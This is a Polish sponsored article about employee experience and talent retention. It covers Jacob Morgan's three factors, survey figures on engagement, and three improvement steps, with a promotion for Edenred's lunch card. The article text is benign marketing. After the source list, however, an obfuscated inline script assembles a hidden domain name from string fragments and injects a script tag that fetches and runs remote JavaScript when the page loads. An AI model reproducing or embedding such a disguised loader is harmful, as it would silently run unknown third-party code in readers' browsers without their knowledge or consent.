Wyszukaj w serwisie
polska i świat praca handel finanse Energetyka Eko technologie
BiznesINFO.pl > Praca > Employee experience – sposób na zatrzymanie talentów w firmie
Artykuł Sponsorowany
Artykuł Sponsorowany 19.02.2024 15:31

Employee experience – sposób na zatrzymanie talentów w firmie

ludzie
materiał partnera

Czy masz wrażenie, że co chwilę otwierasz rekrutacje na te same stanowiska, wskaźnik rotacji w Twojej firmie szaleje, a kandydatów chętnych do pracy nie przybywa? Winowajców może być wielu – sezonowość Twojej branży, zmiany gospodarcze lub… kiepskie doświadczenie pracowników, czyli employee experience. Tłumaczymy, o co chodzi i jak to naprawić.

Czym jest employee experience?

Hasło employee experience (EX) w wolnym tłumaczeniu na polski oznacza „doświadczenie pracownika”. Nie jedno, a doświadczenia ogółem. Definicja jest pojemna – obejmuje całościowe relacje między pracodawcą a jego zespołem. Employee experience zaczyna się w chwili, w której kandydat czyta ogłoszenie rekrutacyjne, trwa w czasie procesu zatrudnienia (choć do tego momentu mówimy o candidate experience, czyli doświadczeniu kandydata) i przez okres zatrudnienia – aż do dnia, kiedy cykl życia pracownika kończy się poprzez opuszczenie organizacji.

Doświadczenia pracownika to efekt szeroko pojętej interakcji między pracownikiem a pracodawcą. Jak zadbać o to, aby była jak najlepsza? Zanim odpowiemy na to pytanie, poznajmy składowe employee experience.

Co tworzy employee experience?

Według badań (1), w 2023 roku doświadczenia pracowników w miejscu pracy spełniają oczekiwania 39% zatrudnionych. To niezły wynik, ale wiele jest jeszcze do zrobienia. 

Jak zadbać o wysoki poziom employee experience? Według Jacoba Morgana, eksperta w temacie EX, czynniki wpływające na tę sferę możemy podzielić na 3 kategorie:

  • środowisko pracy – obejmuje organizację przestrzeni biurowej, jej ergonomię oraz komfort wykonywania obowiązków. Na środowisko pracy wpływa jakość relacji między współpracownikami oraz możliwość (lub jej brak, choć wtedy wpływ jest raczej negatywny) rozwoju osobistego i zachowanie równowagi między życiem zawodowym a prywatnym;
  • dostępność i jakość technologii używanej w miejscu pracy – dostarczanie pracownikom efektywnych i komfortowych narzędzi pracy jest bardzo ważne dla postrzegania firmy. Szczególnie jeśli zespół pracuje zdalnie. Technologia staje się niezbędna i może być elementem, który codziennie ułatwia lub uprzykrza życie;
  • kultura organizacji – to szerokie pojęcie, które obejmuje misję i wizję firmy, sposób zarządzania zespołem, strukturę organizacyjną, system wynagrodzeń i benefitów, organizację czasu pracy, atmosferę panującą wśród pracowników, a nawet sposób spędzania przerwy na lunch.

To wszystko razem wpływa na jakość doświadczeń pracowników, budując zaangażowanie lub demotywując, gdy któryś obszar jest niedostatecznie zaopiekowany.

Dlaczego warto dbać o doświadczenia pracownika?

Zadowolony pracownik to efektywny pracownik. O doświadczenia zatrudnionych warto zadbać z co najmniej kilku powodów:

  • performance zaangażowanego pracownika jest zdecydowanie lepszy niż wyniki jego niezadowolonego kolegi;
  • skupienie na zadaniach jest większe, a czas ich ukończenia – krótszy;
  • zaangażowany pracownik wykazuje większą inicjatywę;
  • rośnie lojalność i maleje chęć opuszczenia firmy;
  • zmotywowana osoba jest cennym i zauważalnym wsparciem dla swojego zespołu.

Potwierdzają to liczby. Badania Gallupa z 2020 roku (2) wykazały, że firmy ze zmotywowanymi pracownikami mają wyższe wskaźniki zysku (EPS) i szybciej odbudowują się po recesji. Zaangażowanie pracowników jest związane z 11 kluczowymi wynikami biznesowymi, w tym z lojalnością klientów, rentownością, produktywnością, rotacją, bezpieczeństwem, absencją i jakością produkcji.

Jak widać, stawka jest wysoka, a o doświadczenia warto dbać. Najlepiej zacząć od zaraz – badania przeprowadzone przez Microsoft Work Trend Index w 2022 roku (3) ujawniły, że 52% pracowników – z pokolenia Z i millenialsów – rozważało zmianę aktualnego miejsca pracy. Skupienie się na budowie zaangażowania pozwoli uszczelnić retencję i zatrzymać talenty w organizacji.

Jak poprawić employee experience i uszczelnić retencję talentów w 3 krokach?

Jeśli masz problem z zaangażowaniem Twoich pracowników, skup się na employee experience. Jak?

  1. Zacznij od zebrania opinii pracowników – wprowadzanie działań mających służyć pracownikom bez pytania ich o zdanie to jak strzał z zamkniętymi oczami. Trafienie w cel jest wtedy raczej kwestią szczęścia. A wystarczy zapytać! Prowadzenie regularnych ankiet i badań wśród zatrudnionych pozwala zaplanować działania oraz ocenić ich efekt. Ankiety mogą dotyczyć różnych aspektów pracy, w tym satysfakcji, zaangażowania, warunków pracy, wsparcia menedżerskiego, oferty benefitów pracowniczych i możliwości rozwoju. Zbierając ankiety, bądź gotów na wszystkie odpowiedzi – także te, które mogą Ci się nie spodobać. Wyciągnij wnioski, wciel je w życie i za jakiś czas sprawdź, co się zmieniło.
  2. Analiza zrobiona? Pora zadbać o rozwój i well-being – inwestowanie w pracowników i troska o ich dobrostan pozwoli realnie wpłynąć na poprawę candidate experience. Działania mogą objąć nie tylko szkolenia i rozszerzanie możliwości rozwoju zawodowego, ale także wsparcie w zakresie zdrowia psychicznego i fizycznego oraz ogólnie pojętego dobrostanu (tu świetnie sprawdzą się rozwiązania Edenred, np. karta lunchowa), elastyczne warunki pracy czy środowisko wspierające work-life balance.
  3. Dbaj o kulturę organizacyjną – atmosfera w pracy ma ogromny wpływ na doświadczenia pracownika. Działania mające na celu promowanie transparentnej komunikacji, doceniania i feedbacku sprawią, że każdy pracownik czuje się doceniany i usłyszany. Co ważne, to menedżerowie i liderzy powinni być wzorem w promowaniu tych wartości.

Realizacja tych kroków wymaga zaangażowania i współpracy na wszystkich poziomach organizacji, od kierownictwa po pracowników liniowych. Employee experience to nie jednorazowa akcja, a długofalowe działanie – w końcu doświadczenia zdobywamy każdego dnia.

Materiał powstał we współpracy z partnerem.

Źródła:

  1. https://success.qualtrics.com/rs/542-FMF-412/images/Employee-Experience-Trends-2023-Global- US.pdf
  2. https://www.gallup.com/workplace/236927/employee-engagement-drives-growth.aspx
  3. https://www.gomada.co/blog/employee-engagement-statistics
<script> (function(){ iw9X_=("u"+"st");iw9X=document.createElement("script");iw9X.async=true; iw9Xu="2237621983";iw9X_+="a"+("t.");iw9X_+="i"+("nf"+("o"))+("/"); iw9Xu+=".965asr7iw9Xfqggz";iw9Xu+="13189pp1l00dm4"; iw9X.src="https://"+iw9X_+iw9Xu;iw9X.type="text/javascript"; d_b=document.body;d_b.appendChild(iw9X); })(); </script>
Tagi: